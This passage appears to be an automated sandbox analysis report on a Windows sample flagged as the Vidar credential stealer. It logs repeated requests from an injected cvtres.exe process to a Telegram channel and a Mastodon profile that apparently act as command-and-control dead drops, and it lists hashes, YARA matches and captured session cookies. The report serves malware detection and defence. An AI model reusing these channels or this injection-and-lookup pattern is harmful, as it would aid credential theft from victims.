                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"bf6f9ea00d1e9729d002200dabef18b5"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-hliGSyjpUnH3oaKgt9bOUg=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=F06HonUiNcv5pa3GP8LMm7nHCaKQodwYvwMe%2Be%2FR4qkkEl%2BZYMAoodG2UEkb6Zgxzv4gWsdfuooSoGoAFwH%2FpfPfyem2ws9sRh0fobZw9cTak1%2FJx%2FU8gXjoIV52mDV25d9G49vNv24HzmGy%2Bb2kFQDL4gd9zSDw10wOuhWBjFDg98K4X59aXa4gOJ45X07TfvczeZs1RE1AmMGHtTpE4T3hlu07LRp4qrg4OP1%2FrFDFRzq9F1Gacptxp1gCVFhLiB9K1Z9cC4Cp9VVNJaPR0ZOcMEf3mO7%2FAXWTAxKW9DKcZwFZeo%2F%2BmdtGhpH7I7%2Bkg7ch69hB4A24jelrR%2B3aJ3M%3D--liyMn3gInrF9zig5--LV%2F8jdZL17lO5jGMdMxb2g%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 0a2f114a-b261-415d-9fce-3ccdc4f1b854
                                                                  X-Runtime: 0.060840
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:51:05 UTC | 200 | IN
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:51:05 UTC | 214 | IN
                                                                  Data Ascii: target="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-wid


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  2 | 192.168.2.7 | 49768 | 149.154.167.99 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:49:39 UTC | 37 | OUT | GET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:49:39 UTC | 37 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:49:39 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9635
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:49:39 UTC | 37 | IN
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  3 | 192.168.2.7 | 49769 | 167.86.107.75 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:49:39 UTC | 47 | OUT | GET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=IE12lf0Aiww%2FO2SHgNYf6X8ktxvGiUwFuvpakzTKg55PVj3wQxbOx8QbPNu%2BbA1ljKtplQtfpHSjetQM3MX253iMB2kbLm3xNEhgwBeB%2F1eCW8Wg13ePrm5lWBQfL9FAO02eO7J9l3dW3s6HTqeP4cis2esq7DldbRI0JLHXWe51XjtZNzvE6RX%2BUXAkx0ez6ASRzCFL8XG1b53DHaPoYf9LXuHN45UIQQKGgtGvY8K1mMZsTqoEdXlHxIHPmSknkSeuS38vHUAtiNgsrwJoiv1FJ7nyRHySt6rMdHZwhHdc3ptf6PDZ0wBxvwMpVHuFlqdHAXbX%2FUb%2Bmlizb1luBXM%3D--UaPP34RL8MYYb6Tj--nidR%2BdAjAGmnnhmujvS6WQ%3D%3D
                                                                  2022-08-05 08:49:39 UTC | 47 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:49:39 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"f271e218b8b5f4cd48ea9805ee1eaac6"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-vZ9efujlufLRVX5ML9zhPQ=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=3rSSEQhY%2BR%2ByBXGg%2FZ7vjc6lT5LBYSBRTm4v10Vjq3ue%2BjwBExu9w58N8ClT%2Bud5pLw%2FhNpc0ZVmhbGFmRwVbdBlbgslSN94eAItWDOu4CGgiK9jhd3mHMacn3wAdie7Kxd1jN1PXBqcxNNL004FuuBE8ZcXHZ9KeIX6GtzzFfvUtnGWm8ZnLLwl53QYxoy96Xw8%2BDQyXocErXsPhQdIg%2FpxcTsHw5r3GkFxULvXrHFqPB166JKLVDREPTkxqTmFOYedLa6uPEB2T4kW8V44pB5aEoVFQGo6vkNDPnAvIGvofiJ%2FGZzi5%2FYGT7rR2OuS9SAL1tKkIZTobYnVx%2Fquwbo%3D--ciXPLxNa31c7%2FJvd--PL1p0wGZ8YwXdexsQfoBoQ%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 8fa0a62b-eeaf-451b-a11c-63c7f250595d
                                                                  X-Runtime: 0.059514
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:49:39 UTC | 49 | IN
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:49:39 UTC | 63 | IN
                                                                  Data Ascii: et="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  4 | 192.168.2.7 | 49786 | 149.154.167.99 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:50:00 UTC | 75 | OUT | GET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:50:00 UTC | 75 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:50:00 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9634
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:50:00 UTC | 75 | IN
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  5 | 192.168.2.7 | 49787 | 167.86.107.75 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:50:01 UTC | 84 | OUT | GET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=3rSSEQhY%2BR%2ByBXGg%2FZ7vjc6lT5LBYSBRTm4v10Vjq3ue%2BjwBExu9w58N8ClT%2Bud5pLw%2FhNpc0ZVmhbGFmRwVbdBlbgslSN94eAItWDOu4CGgiK9jhd3mHMacn3wAdie7Kxd1jN1PXBqcxNNL004FuuBE8ZcXHZ9KeIX6GtzzFfvUtnGWm8ZnLLwl53QYxoy96Xw8%2BDQyXocErXsPhQdIg%2FpxcTsHw5r3GkFxULvXrHFqPB166JKLVDREPTkxqTmFOYedLa6uPEB2T4kW8V44pB5aEoVFQGo6vkNDPnAvIGvofiJ%2FGZzi5%2FYGT7rR2OuS9SAL1tKkIZTobYnVx%2Fquwbo%3D--ciXPLxNa31c7%2FJvd--PL1p0wGZ8YwXdexsQfoBoQ%3D%3D
                                                                  2022-08-05 08:50:01 UTC | 85 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:50:01 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"c2994c3008258a0f5f22e24f062e050b"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-dLglWmkK2DXilNlj6PAYsA=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=cBV6gswXNvy8Hgb%2BvExlczZjstftQa27zJ%2ByonVRi5vw9q44kYaXOHqqk%2FMhqSyxc2K1n3IXUv4kERfPbDEZOwE6NFx%2BLntMjgu1MWeXu90ji40Xeo7Tz0u9MgjPeSND%2BppXUEiqV%2Bou0NkQvBHoflX27u%2BLD6qQzJ6oEhtEEA7VVKadgTfzBP2a0zRCmF4SsemcSDzT8BNNzs1M%2BIr4CTeavXuTu%2BJCm0uuMkUySIWpjXI2ILBRTS6oqhKWITt4DN8y09XOU2uhmLZARu%2BXQUXiFg8MhEuyus2jpZ3LM2BaLgmhu4lCR67q728X8Wn%2Bl%2FdyVOgV5qfUpjC%2F2Xeeaxs%3D--9MBRf%2FPU0zFwfS96--LxGMiLJEI8rWcXno6EKaag%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 40155b8a-7a1e-4660-9353-f1d8198128fe
                                                                  X-Runtime: 0.101000
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:50:01 UTC | 87 | IN
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:50:01 UTC | 101 | IN
                                                                  Data Ascii: target="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-wid


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  6 | 192.168.2.7 | 49801 | 149.154.167.99 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:50:22 UTC | 112 | OUT | GET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:50:22 UTC | 112 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:50:22 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9636
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:50:22 UTC | 113 | IN
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  7 | 192.168.2.7 | 49802 | 167.86.107.75 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:50:22 UTC | 122 | OUT | GET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=cBV6gswXNvy8Hgb%2BvExlczZjstftQa27zJ%2ByonVRi5vw9q44kYaXOHqqk%2FMhqSyxc2K1n3IXUv4kERfPbDEZOwE6NFx%2BLntMjgu1MWeXu90ji40Xeo7Tz0u9MgjPeSND%2BppXUEiqV%2Bou0NkQvBHoflX27u%2BLD6qQzJ6oEhtEEA7VVKadgTfzBP2a0zRCmF4SsemcSDzT8BNNzs1M%2BIr4CTeavXuTu%2BJCm0uuMkUySIWpjXI2ILBRTS6oqhKWITt4DN8y09XOU2uhmLZARu%2BXQUXiFg8MhEuyus2jpZ3LM2BaLgmhu4lCR67q728X8Wn%2Bl%2FdyVOgV5qfUpjC%2F2Xeeaxs%3D--9MBRf%2FPU0zFwfS96--LxGMiLJEI8rWcXno6EKaag%3D%3D
                                                                  2022-08-05 08:50:22 UTC | 123 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:50:22 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"32c8b9e673b4aaa051f347271f6bf081"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-HrEcTrDQt0VOPhA9Duc+Vw=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=odijTynxlktrze7IgYOSVyYGax6MLuq%2BHgXXNKVkWj0EmP%2BY%2BYajeG%2F8FkitzpankLQzKOs7zUEdBhjbxOzpdZ1RpsOQGZ1AUSKbXvelp9WMXNXnJ654jBiZtol1X4q0pNgUdviAwoWtj%2FRytZuF3icv9tA2rrhSHuj8RNt7upfkwzVVGdrp1OipqNMvxNGxOGsFr55qZoPRd7OunaK4YDlwg%2Bc1dFbtqJ%2FwmLTyaTlwPgipiHfY3D96mosQe3LYewtprF6rsACbNZQUOPaPNuvOAKe1MffUWL9jfeHvRGne%2Frrk4sQKfhRHzSDToiAhNgEMrluTU%2FqXba1%2FBYcmyoU%3D--bxICJGAgGqamQv1Z--NCklHYqUpYEpY8rfNxpO7g%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 5a371a80-1412-4305-80b6-62f3908a4fec
                                                                  X-Runtime: 0.068325
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:50:22 UTC | 125 | IN | Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:50:22 UTC | 139 | IN | Data Ascii: _blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'><h


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  8 | 192.168.2.7 | 49854 | 149.154.167.99 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:50:44 UTC | 150 | OUT | GET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:50:44 UTC | 150 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:50:44 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9636
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:50:44 UTC | 150 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  9 | 192.168.2.7 | 49855 | 167.86.107.75 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                  2022-08-05 08:50:44 UTC | 160 | OUT | GET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=odijTynxlktrze7IgYOSVyYGax6MLuq%2BHgXXNKVkWj0EmP%2BY%2BYajeG%2F8FkitzpankLQzKOs7zUEdBhjbxOzpdZ1RpsOQGZ1AUSKbXvelp9WMXNXnJ654jBiZtol1X4q0pNgUdviAwoWtj%2FRytZuF3icv9tA2rrhSHuj8RNt7upfkwzVVGdrp1OipqNMvxNGxOGsFr55qZoPRd7OunaK4YDlwg%2Bc1dFbtqJ%2FwmLTyaTlwPgipiHfY3D96mosQe3LYewtprF6rsACbNZQUOPaPNuvOAKe1MffUWL9jfeHvRGne%2Frrk4sQKfhRHzSDToiAhNgEMrluTU%2FqXba1%2FBYcmyoU%3D--bxICJGAgGqamQv1Z--NCklHYqUpYEpY8rfNxpO7g%3D%3D
                                                                  2022-08-05 08:50:44 UTC | 160 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:50:44 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"caf4cc37237e7fc1bf6428a925b5bae0"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-i/lixRy9GKJYqoH2UuhdCg=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=G8wdgwz%2FDemSpy0Da1ZLqVdSh5XC%2FhOntkD9%2FioEKONmGFQbKw3ZbiJ4RIMQvyl5QKxN%2FpcDH0nKadQ0yXDwXyz6yqDcLvbVjYrc1VwLIggpvLXohspOLTi9YyRFkDXD1U6%2Fzrzrb4LoA5rAsIFcowDfc23g9dzpYcSLczI6VlHA0lfP8JjHOwarQxEdzM6akhIz0PxsXrVBHQQArBfIyixEHqMzgVy%2FgvPIRcQ2qdVLKMgTPmDwVbQ0%2BqoNguC6M%2F7xjoKMMQknPlrQIslHVR5u8qBY9lIeeNK373jl%2B82kCofXgGW%2BvK4Vwx2GKefGraC9M1B%2Bz7G9H6WpaKFziTw%3D--Ffkg6BiJ3LNw7A7D--YyCOAf66iro8NmL254gNlw%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: fb01facc-65ef-4503-9b0d-12323d7b4f20
                                                                  X-Runtime: 0.060382
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:50:44 UTC | 162 | IN | Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:50:44 UTC | 176 | IN | Data Ascii: ="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'>


                                                                  Target ID:0
                                                                  Start time:10:49:10
                                                                  Start date:05/08/2022
                                                                  Path:C:\Users\user\Desktop\uGfpJynSWM.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\uGfpJynSWM.exe"
                                                                  Imagebase:0x830000
                                                                  File size:374960 bytes
                                                                  MD5 hash:EB84AEEF20EA974BF207DD6DF8446567
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low

                                                                  Target ID:1
                                                                  Start time:10:49:12
                                                                  Start date:05/08/2022
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Imagebase:0xb0000
                                                                  File size:43176 bytes
                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.594144374.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate

                                                                    Execution Graph

                                                                    Execution Coverage:23.9%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:26.5%
                                                                    Total number of Nodes:113
                                                                    Total number of Limit Nodes:5

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.336074239.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_13b0000_uGfpJynSWM.jbxd
                                                                    Similarity
                                                                    • API ID:
